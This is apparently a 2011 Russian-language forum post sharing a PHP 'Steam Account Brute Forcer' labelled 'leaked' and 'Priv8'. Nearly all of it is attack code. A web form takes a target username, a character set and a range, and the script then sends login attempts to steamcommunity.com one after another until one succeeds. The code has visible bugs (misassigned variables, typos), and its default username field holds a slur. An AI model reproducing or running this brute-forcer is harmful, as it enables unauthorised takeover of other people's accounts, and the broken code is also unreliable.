Steam Account Brute Forcer [PHP]

Код:
<html>
<body>
<style>

body {
    background-color: #2b2b2b;
    background-image: url(images/background.gif);
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #B0B0B0;
}
.border
{
border: 1px solid #006699;
background-color:#000000;
}
.header
{
background-color:#000000;
}
.content-background
{
background-color:#000000;
}
.text-strong
{
font-weight:bold;
}
.content-header
{
background-image:url(images/content-header.gif);
}
.content-border
{
border: 1px solid #006699;
background-color:#1A1A1A;
}
.content-background
{
background-color:#000000;
background-image:url(images/content-background.gif);
}
a:link {
    color: #006699;
}
a:visited {
    color: #006699;
}
a:hover {
    color: #CCCCCC;
}
a:active {
    color: #CCCCCC;
}
textarea
{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
}
input
{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
    }
    select
    {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
    }
</style>

<?PHP
/*************************************
leaked
*************************************/
if(isset($_POST['end'])){

#$user = $_POST['user'];
#$char = $_POST['char'];
#$start = $POST['start'];
#$end = $_POST['end'];
$pass = $start;
$count = 0;
$found = FALSE;

function Login_Steam($user, $pass)
{
$input = post("https://steamcommunity.com/:443", "action=doLogin&steamAccountName=".$user."&steamPassword=".$pass."");
return $input;
}
function input_match($source, $num, $preg, $preg1)
{
$parts = explode($preg, $source);
    $parts = explode($preg1, $parts[$num]);
        $var = $parts[0];
return $parts[0];
}

function match_login($input){
if(!input_match($input, 1, "<h2>", "<h2>"))
{
return "Logged in";
}else{
return "Login Failure";
}
}

function post($site, $data)
{
$rand = rand(1, 9999);
$ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$site);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,$data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, $site);  
    curl_setopt($ch, CURLOPT_COOKIEFILE, "tmp2.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "tmp2.txt");
        $result = curl_exec ($ch);
return $result;  
}

function next_pass($pass,$charset,$pos=1) { // borrowed from xprog
   $offset = strlen($pass) - $pos;
   if ($offset == -1) {  //did all passwords in current length, increasing length.
      $pass{$offset+1} = substr($charset,0,1);
      $pass .= substr($charset,0,1);
   }
   else {
      $char = $pass{$offset};
      $charset_pos = strpos($charset,$char)+1;
      if ($charset_pos == strlen($charset)) {  //offset char reached end of charset, moving up one.
         $pass{$offset} = substr($charset,0,1);
         $pass = next_pass($pass,$charset,$pos+1);
      }
      else {  //incrementing offset char.
         $pass{$offset} = substr($charset,$charset_pos,1);
      }
   }
   return $pass;
}

function Full_Login($user, $pass)
{
$input = Login_Steam($user, $pass);
$output = match_login($input);
return $output;
}


while ($pass != $end and !$found)
{
if (Full_Login($user, $pass) == "Logged in")
    {
    die("<center><font face='Trebuchet MS' size=3><b>Logged in with $user $pass</b></font></center>");
    $found = TRUE;
        }else{
        echo "[~] Failed with $pass <br>";
    $pass = next_pass($pass,$char);
        }
            $count++;
    }
if(!found)
{
echo "Failed to login with any of the ($count) attempts, change your charset or pass limit";
}

}else{
echo '<center>
<table width="33%" height="90" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3">
<tr>
<td class="content-background">
<div align="center"><center><font face="Trebuchet MS" size=3>
    <b>Priv8 Steam BruteForcer [Mad-Hatter]</b>
</font>
</center>
<br>
<font face="Trebuchet MS" size=2 color=#006699>
<hr>
<form method="POST" action="'.$_SERVER['PHP_SELF'].'">
Username: <input type="text" name="user" value="Fag2Rape"><br>
Charset:  <select name="char">
        <option value="0123456789">0-9</option>
        <option value="abcdefghijklmnopqrstuvwxyz">a-z</option>
        <option value="ABCDEFGHIJKLMNOPQRSTUVWXYZ">A-Z</option>
        <option value="!@#$%^&*></\[])(~`+-_=">[Misc Symbols ! - =]</option>
        <option value="0123456789abcdefghijklmnopqrstuvwxyz">0-9 + a-z</option>
        <option value="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ">0-9 + A-Z</option>
        <option value="0123456789!@#$%^&*></\[])(~`+-_=">0-9 + Symbol</option>
        <option value="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX  YZ">a-z + A-Z</option>
        <option value="abcdefghijklmnopqrstuvwxyz!@#$%^&*></\[])(~`+-_=">a-z + Symbol</option>
        <option value="ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*></\[])(~`+-_=">A-Z + Symbol</option>
        <option value="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX  YZ!@#$%^&*></\[])(~`+-_=">a-z + A-Z + Symbol</option>
        </select>
<br>
Start:    <input type="text" name="start" value="0"><br>
End:       <input type="text" name="end" value="ZZZZZZZZ"><br>
<input type="submit" name="submit" value="Brute!">';
$user = $_POST['user'];
$char = $_POST['char'];
$start = $_POST['start'];
$end = $_POST['end'];
}
?>
</body>
</html>
Инструкция взлома - Это пособия для безопасности!

Меню навигации

Пользовательские ссылки

Объявление

Информация о пользователе

Steam Account Brute Forcer [PHP]

Сообщений 1 страница 1 из 1

Поделиться12011-08-30 01:07:33
